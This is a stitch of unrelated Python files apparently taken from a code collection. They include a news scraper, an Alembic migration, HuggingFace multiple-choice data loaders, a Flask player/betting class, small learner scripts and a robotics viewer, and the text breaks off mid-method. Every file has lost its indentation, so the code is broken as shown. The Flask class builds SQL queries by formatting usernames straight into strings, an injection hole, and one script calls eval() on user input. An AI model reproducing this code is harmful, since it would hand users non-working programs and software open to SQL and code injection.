Path=r"C:\Users\salman\desktop\chromedriver\chromedriver.exe"
driver = webdriver.Chrome(options=chrome_options, executable_path=Path)
url="https://www.geo.tv/latest-news"
today = date.today()
class geoC:
def connect_db():
client = MongoClient("localhost", 27017)
return client
client = connect_db()
global db
global collection
db = client['geoDB']#database creation in mongodb
collection=db['geoT'] # document creation
global download_images
global save_image_to_file
global unvisitedURLs
unvisitedURLs=db['unvisitedURLs']
global visitedURLs
visitedURLs=db['visitedURLs']
def linksCrawl(self):
driver.get(url)
time.sleep(3)
try:
elements = driver.find_elements_by_xpath("//a[@href]")#finding all href in page
for x in elements:
# print(driver.current_url)
string=x.get_attribute("href")#all href links
if(string.startswith("https://www.geo.tv/latest/")):
if(db.visitedURLs.find({"urls":string}).count()==0 and db.unvisitedURLs.find({"urls":string}).count()==0 ):
data={"urls":string}
print(string)
unvisitedURLs.insert_one(data)
else:
pass
except Exception as e:
pass
def crawl(self,url,urlList):
try:
documents = urlList
for k,doc in enumerate( documents,start=0):
mainUrl=doc["urls"]
driver.get(mainUrl)
unvisitedURLs.delete_many({"urls":mainUrl})
visitedURLs.insert_one({"urls":mainUrl})
time.sleep(3)
#----------------------------getting date----------------------------
try:
dateElement=driver.find_element_by_xpath("/html/body/div[2]/section/div/div[3]/div[1]/div[2]")
dateElementP=dateElement.find_element_by_tag_name("p").get_attribute("textContent")
dateElementProcessed = dateElementP.split("\n")[2]
dateArray=dateElementProcessed.split(" ")
Articledate=dateArray[1]+" "+dateArray[2]+" "+dateArray[3]
#-------------------------------article=date------------------------
print("article date: ",Articledate)
#--------------------------------todays=date--------------------------
todaysDate=today.strftime("%b %d, %Y")
print("todays date",todaysDate)
if(todaysDate==Articledate):#==============comparison=of=dates================
#
storyContent=driver.find_element_by_class_name("story-area")
# #===========================paragraphs===========================
paragraphs=storyContent.find_elements_by_tag_name("p")
#
paragraphBody=""
for para in paragraphs:
paragraphBody=paragraphBody+para.text
print(para.text)
#================================story title====================================
titleElement=storyContent.find_element_by_tag_name("h1")
title=titleElement.text
print("title ",title)
#==================================IMAGE=========================================
i=0
imgTag=storyContent.find_elements_by_tag_name("img")
for img in imgTag:
imageLink=img.get_attribute("src")
print("image link: ",imageLink)
dirname=re.sub("[\.]", "",imageLink)
response = requests.get(imageLink)
currentDirectory = os.getcwd()
i=i+1
with open('geoImage'+str(k)+" "+str(i)+'.jpg', 'wb') as out_file:
out_file.write(response.content)
imageDir=currentDirectory+'/'+"geoImage"+str(k)+" "+str(i)+'.jpg'
collection.insert_one({"story":paragraphBody,"title":title,"url":mainUrl,"date": Articledate,"imageDir":imageDir})
except Exception as e:
print(e)
unvisitedURLs.delete_many({"urls":mainUrl})
visitedURLs.insert_one({"urls":mainUrl})
driver.close()
except Exception as e:
pass
|
"""add rank to issue
Revision ID: 4d5027f9faac
Revises: 6d3439e14660
Create Date: 2019-03-23 13:37:47.267698
"""
from alembic import op
import sqlalchemy as sa
from pabu.tools import get_table
# revision identifiers, used by Alembic.
revision = '4d5027f9faac'
down_revision = '6d3439e14660'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('issues', sa.Column('rank', sa.Integer(), nullable=True))
issues = get_table(op.get_bind(), 'issues')
op.execute(issues.update().values(rank = issues.c.id))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('issues', 'rank')
# ### end Alembic commands ###
|
import pandas as pd
import numpy as np
df = pd.read_excel("input.xlsx")
print(df)
series_obj = list(df.columns)
print("Choose sequence From this :- ",*series_obj[:-1])
user_series_ip = []
print()
print("Enter timeseries sequence: ")
for i in range(len(series_obj)-1):
x = input("=> ")
user_series_ip.append(x)
print(*user_series_ip)
table = pd.pivot_table(df,index=user_series_ip,values="Sales",aggfunc=np.sum)#,columns=["State","City","Product","Sales"]
#print(table)
df1 = pd.DataFrame(table)
#print(df1)
df1.to_excel("output.xlsx")
df2 = pd.read_excel("output.xlsx")
print(df2)
count_TS = 0
for i in df2.columns:
if i =="":
continue
count_TS += df2[i].count()
print("Total Timeseries = ",count_TS + 1 -(df2['Sales'].count()))
|
import random
def play():
words = ["python", "java", "kotlin", "javascript"]
word = random.choice(words)
found = set()
print("H A N G M A N")
print()
for i in range(8):
print(generate_display(word, found))
guess = input("Input a letter: ")
if guess in word:
found.add(guess)
else:
print("That letter doesn't appear in the word")
print()
print("Thanks for playing!")
print("We'll see how well you did in the next stage")
def generate_display(word, found):
display = ""
for c in word:
if c in found:
display += c
else:
display += "-"
return display
play()
|
#!/usr/bin/env python3.7
"""
Mastering Object-Oriented Python 2e
Code Examples for Mastering Object-Oriented Python 2nd Edition
Chapter 17. Example 2.
"""
import unittest
# SQLite testing
# =========================
# This is integration testing, not unit testing.
# Integration means we use the database
# instead of isolating our code from the database.
# A more formal unit test would mock the database layer.
# SQLAlchemy ORM classes
from typing import Any
from Chapter_12.ch12_ex4 import Base, Blog, Post, Tag, assoc_post_tag
import datetime
import sqlalchemy.exc
from sqlalchemy import create_engine
def build_test_db(name="sqlite:///./data/ch17_blog.db"):
"""
Create Test Database and Schema
"""
engine = create_engine(name, echo=True)
Base.metadata.drop_all(engine)
Base.metadata.create_all(engine)
return engine
# Unittest Case
from sqlalchemy.orm import sessionmaker, Session
class Test_Blog_Queries(unittest.TestCase):
Session: Any
session: Session
@staticmethod
def setUpClass() -> None:
engine = build_test_db()
Test_Blog_Queries.Session = sessionmaker(bind=engine)
session = Test_Blog_Queries.Session()
tag_rr = Tag(phrase="#RedRanger")
session.add(tag_rr)
tag_w42 = Tag(phrase="#Whitby42")
session.add(tag_w42)
tag_icw = Tag(phrase="#ICW")
session.add(tag_icw)
tag_mis = Tag(phrase="#Mistakes")
session.add(tag_mis)
blog1 = Blog(title="Travel 2013")
session.add(blog1)
b1p1 = Post(
date=datetime.datetime(2013, 11, 14, 17, 25),
title="Hard Aground",
rst_text="""Some embarrassing revelation. Including ☹ and ⚓︎""",
blog=blog1,
tags=[tag_rr, tag_w42, tag_icw],
)
session.add(b1p1)
b1p2 = Post(
date=datetime.datetime(2013, 11, 18, 15, 30),
title="Anchor Follies",
rst_text="""Some witty epigram. Including ☺ and ☀︎︎""",
blog=blog1,
tags=[tag_rr, tag_w42, tag_mis],
)
session.add(b1p2)
blog2 = Blog(title="Travel 2014")
session.add(blog2)
session.commit()
def setUp(self) -> None:
self.session = Test_Blog_Queries.Session()
def test_query_eqTitle_should_return1Blog(self) -> None:
"""Tests schema definition"""
results = self.session.query(Blog).filter(Blog.title == "Travel 2013").all()
self.assertEqual(1, len(results))
self.assertEqual(2, len(results[0].entries))
def test_query_likeTitle_should_return2Blog(self) -> None:
"""Tests SQLAlchemy, and test data"""
results = self.session.query(Blog).filter(Blog.title.like("Travel %")).all()
self.assertEqual(2, len(results))
def test_query_eqW42_tag_should_return2Post(self) -> None:
results = self.session.query(Post).join(assoc_post_tag).join(Tag).filter(
Tag.phrase == "#Whitby42"
).all()
self.assertEqual(2, len(results))
def test_query_eqICW_tag_should_return1Post(self) -> None:
results = self.session.query(Post).join(assoc_post_tag).join(Tag).filter(
Tag.phrase == "#ICW"
).all()
# print( [r.title for r in results] )
self.assertEqual(1, len(results))
self.assertEqual("Hard Aground", results[0].title)
self.assertEqual("Travel 2013", results[0].blog.title)
self.assertEqual(
set(["#RedRanger", "#Whitby42", "#ICW"]),
set(t.phrase for t in results[0].tags),
)
# Make a suite of the testcases
def suite8() -> unittest.TestSuite:
s = unittest.TestSuite()
s.addTests(unittest.defaultTestLoader.loadTestsFromTestCase(Test_Blog_Queries))
return s
if __name__ == "__main__":
t = unittest.TextTestRunner()
t.run(suite8())
__test__ = {name: value for name, value in locals().items() if name.startswith("test_")}
if __name__ == "__main__":
import doctest
doctest.testmod(verbose=False)
|
# coding=utf-8
# Copyright 2018 The Google AI Language Team Authors and The HuggingFace Inc. team.
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Multiple choice fine-tuning: utilities to work with multiple choice tasks of reading comprehension """
import csv
import glob
import json
import logging
import os
from collections import defaultdict
from typing import List
import tqdm
from transformers import PreTrainedTokenizer
import torch
from torch.utils.data import Dataset
from collections import Counter
logger = logging.getLogger(__name__)
class InputExample(object):
"""A single training/test example for multiple choice"""
def __init__(self, example_id, question, contexts, endings, label=None):
"""Constructs a InputExample.
Args:
example_id: Unique id for the example.
contexts: list of str. The untokenized text of the first sequence (context of corresponding question).
question: string. The untokenized text of the second sequence (question).
endings: list of str. multiple choice's options. Its length must be equal to contexts' length.
label: (Optional) string. The label of the example. This should be
specified for train and dev examples, but not for test examples.
"""
self.example_id = example_id
self.question = question
self.contexts = contexts
self.endings = endings
self.label = label
class InputFeatures(object):
def __init__(self, example_id, choices_features, label):
self.example_id = example_id
self.choices_features = [
{"input_ids": input_ids, "input_mask": input_mask, "segment_ids": segment_ids}
for input_ids, input_mask, segment_ids in choices_features
]
self.label = label
class DataProcessor(object):
"""Base class for data converters for multiple choice data sets."""
def get_train_examples(self, data_dir):
"""Gets a collection of `InputExample`s for the train set."""
raise NotImplementedError()
def get_dev_examples(self, data_dir):
"""Gets a collection of `InputExample`s for the dev set."""
raise NotImplementedError()
def get_test_examples(self, data_dir):
"""Gets a collection of `InputExample`s for the test set."""
raise NotImplementedError()
def get_labels(self):
"""Gets the list of labels for this data set."""
raise NotImplementedError()
class RaceProcessor(DataProcessor):
"""Processor for the RACE data set."""
def get_train_examples(self, data_dir):
"""See base class."""
logger.info("LOOKING AT {} train".format(data_dir))
high = os.path.join(data_dir, "train/high")
middle = os.path.join(data_dir, "train/middle")
high = self._read_txt(high)
middle = self._read_txt(middle)
return self._create_examples(high + middle, "train")
def get_dev_examples(self, data_dir):
"""See base class."""
logger.info("LOOKING AT {} dev".format(data_dir))
high = os.path.join(data_dir, "dev/high")
middle = os.path.join(data_dir, "dev/middle")
high = self._read_txt(high)
middle = self._read_txt(middle)
return self._create_examples(high + middle, "dev")
def get_test_examples(self, data_dir):
"""See base class."""
logger.info("LOOKING AT {} test".format(data_dir))
high = os.path.join(data_dir, "test/high")
middle = os.path.join(data_dir, "test/middle")
high = self._read_txt(high)
middle = self._read_txt(middle)
return self._create_examples(high + middle, "test")
def get_labels(self):
"""See base class."""
return ["0", "1", "2", "3"]
def _read_txt(self, input_dir):
lines = []
files = glob.glob(input_dir + "/*txt")
for file in tqdm.tqdm(files, desc="read files"):
with open(file, "r", encoding="utf-8") as fin:
data_raw = json.load(fin)
data_raw["race_id"] = file
lines.append(data_raw)
return lines
def _create_examples(self, lines, set_type):
"""Creates examples for the training and dev sets."""
examples = []
for (_, data_raw) in enumerate(lines):
race_id = "%s-%s" % (set_type, data_raw["race_id"])
article = data_raw["article"]
for i in range(len(data_raw["answers"])):
truth = str(ord(data_raw["answers"][i]) - ord("A"))
question = data_raw["questions"][i]
options = data_raw["options"][i]
examples.append(
InputExample(
example_id=race_id,
question=question,
contexts=[article, article, article, article], # this is not efficient but convenient
endings=[options[0], options[1], options[2], options[3]],
label=truth,
)
)
return examples
class SwagProcessor(DataProcessor):
"""Processor for the SWAG data set."""
def get_train_examples(self, data_dir):
"""See base class."""
logger.info("LOOKING AT {} train".format(data_dir))
return self._create_examples(self._read_csv(os.path.join(data_dir, "train.csv")), "train")
def get_dev_examples(self, data_dir):
"""See base class."""
logger.info("LOOKING AT {} dev".format(data_dir))
return self._create_examples(self._read_csv(os.path.join(data_dir, "val.csv")), "dev")
def get_test_examples(self, data_dir):
"""See base class."""
logger.info("LOOKING AT {} dev".format(data_dir))
raise ValueError(
"For swag testing, the input file does not contain a label column. It can not be tested in current code"
"setting!"
)
return self._create_examples(self._read_csv(os.path.join(data_dir, "test.csv")), "test")
def get_labels(self):
"""See base class."""
return ["0", "1", "2", "3"]
def _read_csv(self, input_file):
with open(input_file, "r", encoding="utf-8") as f:
return list(csv.reader(f))
def _create_examples(self, lines: List[List[str]], type: str):
"""Creates examples for the training and dev sets."""
if type == "train" and lines[0][-1] != "label":
raise ValueError("For training, the input file must contain a label column.")
examples = [
InputExample(
example_id=line[2],
question=line[5], # in the swag dataset, the
# common beginning of each
# choice is stored in "sent2".
contexts=[line[4], line[4], line[4], line[4]],
endings=[line[7], line[8], line[9], line[10]],
label=line[11],
)
for line in lines[1:] # we skip the line with the column names
]
return examples
class ArcProcessor(DataProcessor):
"""Processor for the ARC data set (request from allennlp)."""
def get_train_examples(self, data_dir):
"""See base class."""
logger.info("LOOKING AT {} train".format(data_dir))
return self._create_examples(self._read_json(os.path.join(data_dir, "train.jsonl")), "train")
def get_dev_examples(self, data_dir):
"""See base class."""
logger.info("LOOKING AT {} dev".format(data_dir))
return self._create_examples(self._read_json(os.path.join(data_dir, "dev.jsonl")), "dev")
def get_test_examples(self, data_dir):
logger.info("LOOKING AT {} test".format(data_dir))
return self._create_examples(self._read_json(os.path.join(data_dir, "test.jsonl")), "test")
def get_labels(self):
"""See base class."""
return ["0", "1", "2", "3"]
def _read_json(self, input_file):
with open(input_file, "r", encoding="utf-8") as fin:
lines = fin.readlines()
return lines
def _create_examples(self, lines, type):
"""Creates examples for the training and dev sets."""
# There are two types of labels. They should be normalized
def normalize(truth):
if truth in "ABCD":
return ord(truth) - ord("A")
elif truth in "1234":
return int(truth) - 1
else:
logger.info("truth ERROR! %s", str(truth))
return None
examples = []
three_choice = 0
four_choice = 0
five_choice = 0
other_choices = 0
# we deleted example which has more than or less than four choices
for line in tqdm.tqdm(lines, desc="read arc data"):
data_raw = json.loads(line.strip("\n"))
if len(data_raw["question"]["choices"]) == 3:
three_choice += 1
continue
elif len(data_raw["question"]["choices"]) == 5:
five_choice += 1
continue
elif len(data_raw["question"]["choices"]) != 4:
other_choices += 1
continue
four_choice += 1
truth = str(normalize(data_raw["answerKey"]))
assert truth != "None"
question_choices = data_raw["question"]
question = question_choices["stem"]
id = data_raw["id"]
options = question_choices["choices"]
if len(options) == 4:
examples.append(
InputExample(
example_id=id,
question=question,
contexts=[
options[0]["para"].replace("_", ""),
options[1]["para"].replace("_", ""),
options[2]["para"].replace("_", ""),
options[3]["para"].replace("_", ""),
],
endings=[options[0]["text"], options[1]["text"], options[2]["text"], options[3]["text"]],
label=truth,
)
)
if type == "train":
assert len(examples) > 1
assert examples[0].label is not None
logger.info("len examples: %s}", str(len(examples)))
logger.info("Three choices: %s", str(three_choice))
logger.info("Five choices: %s", str(five_choice))
logger.info("Other choices: %s", str(other_choices))
logger.info("four choices: %s", str(four_choice))
return examples
class TemporalProcessorForBCE(DataProcessor):
def _read_lines(self, input_file):
with open(input_file, "r", encoding="utf-8") as fin:
lines = fin.readlines()
return lines
def get_train_examples(self, data_dir, train_filename="norm_dev_3783.tsv"):
print(train_filename)
return self._create_examples(self._read_lines(os.path.join(data_dir, train_filename)), "train")
def get_dev_examples(self, data_dir, val_filename="norm_test_9442.tsv"):
print(val_filename)
return self._create_examples(self._read_lines(os.path.join(data_dir, val_filename)), "dev")
def get_labels(self):
return ["yes", "no"]
def _create_examples(self, lines, type):
examples = []
# try to concat lines with text_a the same
instance_dict = defaultdict(list)
for (i, line) in enumerate(lines):
group = line.split("\t")
id = "%s-%s" % (type, i)
text_a = group[0] + " " + group[1]
text_b = group[2]
label = group[3]
instance_dict[text_a].append([id, text_b, label])
for k, v in instance_dict.items():
examples.append(
InputExample(
example_id=v[0][0],
question="",
contexts=[k]*len(v),
endings=[v[i][1] for i in range(len(v))],
label=[v[i][2] for i in range(len(v))]
)
)
return examples
class TemporalProcessor(DataProcessor):
def _read_lines(self, input_file):
with open(input_file, "r", encoding="utf-8") as fin:
lines = fin.readlines()
return lines
def get_train_examples(self, data_dir, train_filename="dev_3783.tsv"):
return self._create_examples(self._read_lines(os.path.join(data_dir, train_filename)), "train")
def get_dev_examples(self, data_dir, val_filename="test_9442.tsv"):
return self._create_examples(self._read_lines(os.path.join(data_dir, val_filename)), "dev")
def get_labels(self):
return ["yes", "no"]
def _create_examples(self, lines, type):
examples = []
# try to concat lines with text_a the same
instance_dict = defaultdict(list)
for (i, line) in enumerate(lines):
group = line.split("\t")
id = "%s-%s" % (type, i)
text_a = group[0] + " " + group[1]
text_b = group[2]
label = group[3]
examples.append(
InputExample(
example_id=id,
question="",
contexts=[text_a],
endings=[text_b],
label=label,
)
)
return examples
class PiqaProcessor(DataProcessor):
def get_train_examples(self, data_dir, train_filename):
"""See base class."""
logger.info("LOOKING AT {} train and searching for {}".format(data_dir, train_filename))
return self._create_examples(self._read_lines(train_filename), self._read_lines(os.path.join(data_dir, "train-labels.lst")), "train")
def get_dev_examples(self, data_dir, val_filename):
"""See base class."""
logger.info("LOOKING AT {} dev and searching for {}".format(data_dir, val_filename))
return self._create_examples(self._read_lines(val_filename), self._read_lines(os.path.join(data_dir, "valid-labels.lst")), "dev")
def get_test_examples(self, data_dir, test_filename):
logger.info("LOOKING AT {} test".format(data_dir))
return self._create_examples(self._read_lines(test_filename), answers=None, type="test")
def get_labels(self):
"""See base class."""
return ["0", "1"]
def _read_lines(self, input_file):
with open(input_file, "r", encoding="utf-8") as fin:
lines = fin.readlines()
return lines
def _create_examples(self, lines, answers=None, type=None):
"""Creates examples for the training and dev sets."""
examples = []
if answers:
for i, (line, ans) in enumerate(zip(lines, answers)):
data_raw = json.loads(line.strip("\n"))
ans = ans.strip("\n")
truth = str(ans)
id = i
if 'retrieved_text' in data_raw.keys():
context = ' '.join([i for i in data_raw['retrieved_text']])
if len(context) == 0:
context = 'placeholder'
examples.append(
InputExample(
example_id=id,
question="",
contexts=['Q: '+data_raw['goal']+' '+context, 'Q: '+data_raw['goal']+' '+context],
endings=['A: '+data_raw['sol1'], 'A: '+data_raw['sol2']],
label=truth,
)
)
else: # baseline
examples.append(
InputExample(
example_id=id,
question="",
contexts=['Q: '+data_raw['goal'], 'Q: '+data_raw['goal']],
endings=['A: '+data_raw['sol1'], 'A: '+data_raw['sol2']],
label=truth,
)
)
# NOTE test with no answer; may be buggy
else:
for i, line in enumerate(lines):
data_raw = json.loads(line.strip("\n"))
id = i
examples.append(
InputExample(
example_id=id,
question="",
contexts=['Q: '+data_raw['goal'], 'Q: '+data_raw['goal']],
endings=['A: '+data_raw['sol1'], 'A: '+data_raw['sol2']],
)
)
if type == "train":
assert len(examples) > 1
assert examples[0].label is not None
logger.info("len examples: %s}", str(len(examples)))
return examples
class TemporalDataset(Dataset):
def __init__(self, *tensors):
# assert all(tensors[0].size(0) == tensor.size(0) for tensor in tensors)
self.tensors = tensors
def __getitem__(self, index):
# import pdb; pdb.set_trace()
return tuple(tensor[index] for tensor in self.tensors)
def __len__(self):
# return self.tensors[0].size(0)
return len(self.tensors[0])
def convert_examples_to_features(
examples: List[InputExample],
label_list: List[str],
max_length: int,
task_name: str,
tokenizer: PreTrainedTokenizer,
pad_token_segment_id=0,
pad_on_left=False,
pad_token=0,
mask_padding_with_zero=True,
) -> List[InputFeatures]:
"""
Loads a data file into a list of `InputFeatures`
"""
label_map = {label: i for i, label in enumerate(label_list)}
len_dict = Counter()
features = []
for (ex_index, example) in tqdm.tqdm(enumerate(examples), desc="convert examples to features"):
if ex_index % 10000 == 0:
logger.info("Writing example %d of %d" % (ex_index, len(examples)))
choices_features = []
# import pdb; pdb.set_trace()
for ending_idx, (context, ending) in enumerate(zip(example.contexts, example.endings)):
inputs = tokenizer.encode_plus(ending, add_special_tokens=True, max_length=max_length)
#if max_length-len(inputs['input_ids'])+1 > 2:
try:
inputs_a = tokenizer.encode_plus(context, add_special_tokens=True, max_length=max_length-len(inputs['input_ids'])+1)
input_ids, token_type_ids = inputs_a['input_ids']+inputs['input_ids'][1:], inputs_a['token_type_ids']+[1]*(len(inputs['token_type_ids'])-1)
except:
print (ex_index)
inputs_a = tokenizer.encode_plus(context, add_special_tokens=True, max_length=max_length)
tmp_a, tmp_b, _ = tokenizer.truncate_sequences(inputs_a['input_ids'][:-1], pair_ids=inputs['input_ids'][1:-1], num_tokens_to_remove=len(inputs_a['input_ids'])+len(inputs['input_ids'])-max_length-1)
input_ids = tmp_a+[tokenizer.sep_token_id]+tmp_b+[tokenizer.sep_token_id]
token_type_ids = [0]*(len(tmp_a)+1)+[1]*(len(tmp_b)+1)
#else:
# inputs_a = {'input_ids':[], 'token_type_ids':[]}
if "num_truncated_tokens" in inputs and inputs["num_truncated_tokens"] > 0:
logger.info(
"Attention! you are cropping tokens (swag task is ok). "
"If you are training ARC and RACE and you are poping question + options,"
"you need to try to use a bigger max seq length!"
)
# The mask has 1 for real tokens and 0 for padding tokens. Only real
# tokens are attended to.
attention_mask = [1 if mask_padding_with_zero else 0] * len(input_ids)
len_dict[len(input_ids)] += 1
# Zero-pad up to the sequence length.
padding_length = max_length - len(input_ids)
if pad_on_left:
input_ids = ([pad_token] * padding_length) + input_ids
attention_mask = ([0 if mask_padding_with_zero else 1] * padding_length) + attention_mask
token_type_ids = ([pad_token_segment_id] * padding_length) + token_type_ids
else:
input_ids = input_ids + ([pad_token] * padding_length)
attention_mask = attention_mask + ([0 if mask_padding_with_zero else 1] * padding_length)
token_type_ids = token_type_ids + ([pad_token_segment_id] * padding_length)
# import pdb; pdb.set_trace()
assert len(input_ids) == max_length
assert len(attention_mask) == max_length
assert len(token_type_ids) == max_length
choices_features.append((input_ids, attention_mask, token_type_ids))
# NOTE: modified for mctaco bce
if task_name == 'mctaco-bce':
label = [label_map[i] for i in example.label]
else:
label = label_map[example.label]
if ex_index < 2:
logger.info("*** Example ***")
logger.info("race_id: {}".format(example.example_id))
for choice_idx, (input_ids, attention_mask, token_type_ids) in enumerate(choices_features):
logger.info("choice: {}".format(choice_idx))
logger.info("input_ids: {}".format(" ".join(map(str, input_ids))))
tokens = tokenizer.convert_ids_to_tokens(input_ids)
logger.info("tokens: %s" % " ".join([str(x) for x in tokens]))
logger.info("attention_mask: {}".format(" ".join(map(str, attention_mask))))
logger.info("token_type_ids: {}".format(" ".join(map(str, token_type_ids))))
logger.info("label: {}".format(label))
features.append(InputFeatures(example_id=example.example_id, choices_features=choices_features, label=label,))
return features
processors = {"race": RaceProcessor, "swag": SwagProcessor, "arc": ArcProcessor, "piqa": PiqaProcessor, "mctaco-bce": TemporalProcessorForBCE, "mctaco": TemporalProcessor}
# processors = {"race": RaceProcessor, "swag": SwagProcessor, "arc": ArcProcessor}
MULTIPLE_CHOICE_TASKS_NUM_LABELS = {"race", 4, "swag", 4, "arc", 4} |
import re
from flask import session
from app.lib.coins import Coin
from app import app, db
from passlib.hash import pbkdf2_sha256
class Players:
__initial_balance = app.config['INITIAL_BALANCE']
def __init__(self):
pass
@staticmethod
def exists(username):
res = db.select('players', where="username='{}'".
format(username), limit=1)
return hasattr(res, 'id')
@staticmethod
def get_player(id=0, username=''):
where = "id='{}'".format(id) if id != 0\
else "username='{}'".format(username)
result = db.select('players', where=where, limit=1)
if not result:
return None
return Player(result.id, result.username,
result.password, result.balance)
@staticmethod
def register_player(player):
""" Registeres the player in DB if valid and signs in """
if not isinstance(player, Player):
raise Exception('Invalid type supplied')
if Players.exists(player.username):
raise ValidationError('Username ' + player.username + ' exists')
fields = ('username', 'balance')
values = (player.username, Players.__initial_balance)
if hasattr(player, 'password'):
fields = fields + ('password')
values = values + (player.password)
db.insert('players', fields, values)
registered = Players.get_player(username=player.username)
registered.sign_in()
class Player:
def __init__(self, id=0, username='', password='', balance=0):
self.username = username
self.id = id
self.__password = password
self.balance = balance
def __password_matches(self, pwd_to_check):
# rounds = app.config['PASS_ROUNDS']
# hash = pbkdf2_sha256.encrypt("password", rounds=rounds)
return pbkdf2_sha256.verify(pwd_to_check, self.__password)
def validate_username(self):
if not hasattr(self, 'username') or\
self.username == '':
raise ValidationError('No username')
elif len(self.username) > 16:
raise ValidationError('Login cannot be more than 16 chars')
elif len(self.username) < 6:
raise ValidationError('Login cannot be less than 6 chars')
elif not re.match("^[A-Za-z0-9_]*$", self.username):
raise ValidationError('Invalid characters')
def validate_password(self):
pass
def sign_in(self):
""" Validates inputs and signes the player in session
if something goes wrong invalidates self to None
"""
self.validate_username()
self = Players.get_player(username=self.username)
if self is not None:
session['pid'] = self.id
else:
raise ValidationError("Username doesnt exist")
def commit_bet(self, bet, balance_change):
if bet.player_id != self.id:
raise Exception("Player id doesnt match with bets player id")
won = bet.outcome == bet.bet_on
changes = {}
changes['balance'] = "balance + ({})".format(str(balance_change))
changes['number_of_bets'] = "number_of_bets + 1"
changes['wagered'] = "wagered + {}".format(bet.amount)
if won:
changes['number_of_bets_won'] = "number_of_bets_won + 1"
where = "id = {}".format(self.id)
db.update('players', changes, where)
class ValidationError(Exception):
pass
|
# cars = ['mazda', 'volvo', 'bmw']
# cars.append('jigul')
# del cars[-1]
# print(cars[-1].title())
# ---
# cars = ['mazda', 'volvo', 'bmw']
# cars.append('jigul')
# cars.remove('jigul')
# print(cars[-1].title())
#---
# cars = ['mazda', 'volvo', 'bmw']
# cars.append('jigul')
# cars.sort()
# cars.reverse()
# print(cars)
# ---
names = []
salarys= []
amount = 0
amount_of_members = input('Введите количество членов семьи: ')
aom = int(amount_of_members)
for i in range(aom):
names.append(input('Имя ' + str(i+1) + ' человека:\n'))
for i in range(aom):
salarys.append(input("Доход "+ str(i+1) + ' человека:\n'))
credit = input('введите сумму кредита :')
how_long = input('на какой срок кредит в месяцах :')
procent = input('введите процент :')
pay_per_mounth = (int(credit) / int(how_long)) + ((int(credit) / 100 * int(procent)) / 12)
print('Месячный платеж', pay_per_mounth)
for salary in salarys:
amount += int(salary)
# amount -= pay_per_mounth
mean = (amount - pay_per_mounth) / aom
mean = str(mean)
for name in names:
print(name.title() + " может потратить" + mean)
|
from numpy import * #importa a biblioteca para se trabalhar com vetores
medias = array(eval(input("Digite as notas dos estudantes: "))) #entrada das medias dos estudantes
while(size(medias) > 1): #o laco while eh necessaria para se repetir a pergunta indefinidamente
aprovado = 0 #contador de aprovados, nota > 5
mon = 0 #contador de monitores, nota > 7
for nota in medias: #leitura diretamente de cada nota, e nao do indice
if(nota >= 5): #verifica se a nota aprova o estudante
aprovado = aprovado + 1 #Se verdade, aprovado eh incrementada em 1
if(nota >= 7): #verifica se o estudante tem nota para ser monitor
mon = mon+1 #se verdade, monitor eh incrementado em 1
print(aprovado-mon) #a diferenca indica apenas os aprovados q nao sao monitores
medias = array(eval(input("Digite as notas dos estudantes: "))) #repe
|
from time import time
import glm
from itbl import Ray, Shader
from itbl.accelerators import SDF, BVHAccel
from itbl.cameras import TrackballCamera
from itbl.shapes import Box
from itbl.util import get_color, get_data
from itbl.viewer import Application, Viewer
from itbl.viewer.backend import *
from wilson import *
import itbl._itbl as _itbl
import time
from kinorrt.search_space import SearchSpace
from kinorrt.mechanics.contact_kinematics import *
import random
from kinorrt.mechanics.stability_margin import *
from kinorrt.rrt import RRTManipulation
import plotly.graph_objects as go
class iTM2d(Application):
def __init__(self, object_shape, example='sofa'):
# Initialize scene.
super(iTM2d, self).__init__(None)
self.mesh = Box(1.0, 0.5, 0.2)
self.light_box = Box(0.2, 0.2, 0.2)
self.example = example
self.object_shape = object_shape
def init(self):
super(iTM2d, self).init()
# Basic lighting shader.
vertex_source = os.path.join(get_data(), 'shader', 'basic_lighting.vs')
fragment_source = os.path.join(get_data(), 'shader', 'basic_lighting.fs')
self.basic_lighting_shader = Shader(vertex_source, fragment_source)
# Lamp shader.
vertex_source = os.path.join(get_data(), 'shader', 'flat.vs')
fragment_source = os.path.join(get_data(), 'shader', 'flat.fs')
self.lamp_shader = Shader(vertex_source, fragment_source)
# Normal shader.
vertex_source = os.path.join(get_data(), 'shader', 'normals.vs')
fragment_source = os.path.join(get_data(), 'shader', 'normals.fs')
geometry_source = os.path.join(get_data(), 'shader', 'normals.gs')
self.normal_shader = Shader(vertex_source, fragment_source, geometry_source)
# Trackball camera.
self.camera = TrackballCamera(radius=50)
# Toggle variables.
self.draw_mesh = True
self.draw_wireframe = True
self.draw_normals = False
def init2(self):
# C++ OpenGL.
_itbl.loadOpenGL()
# 2D shader.
vertex_source = os.path.join(get_data(), 'shader', '2d.vs')
fragment_source = os.path.join(get_data(), 'shader', '2d.fs')
self.flat_shader = Shader(vertex_source, fragment_source)
# Object
self.env_contacts = None
self.manip_contacts = None
self.env_contacts = None
self.manifold = None
self.v_m = None
self.counter = 0
self.target = _itbl.Rectangle(self.object_shape[0] * 2, self.object_shape[1] * 2, 2, 0.0)
if self.example == 'sofa':
self.collision_manager = create_hallway(HALLWAY_W, BLOCK_W, BLOCK_H, self.object_shape[
0] * 2.5 + BLOCK_W * 0.5) # uniform_sample_maze((4,4), 3, 1.25)
elif self.example == 'maze':
self.collision_manager = uniform_sample_maze((3, 3), 3, 1.25)
elif self.example == 'corner':
self.collision_manager = corner()
elif self.example == 'wall':
self.collision_manager = wall()
elif self.example == 'table':
self.collision_manager = corner()
elif self.example == 'obstacle_course':
self.collision_manager = obstacle_course()
elif self.example == 'peg-in-hole-v':
self.collision_manager = peg_in_hole_v()
elif self.example == 'peg-in-hole-p':
self.collision_manager = peg_in_hole_p()
elif self.example == 'book':
self.collision_manager = book()
elif self.example == 'unpacking':
self.collision_manager = unpacking()
else:
print('Cannot find collision manager!')
raise
self.all_configs_on = False
self.step_on = False
self.path_on = False
self.manip_p = None
self.next_manip_p = None
def draw_manifold(self):
if self.manifold is None:
return
glPointSize(5)
manifold = self.manifold
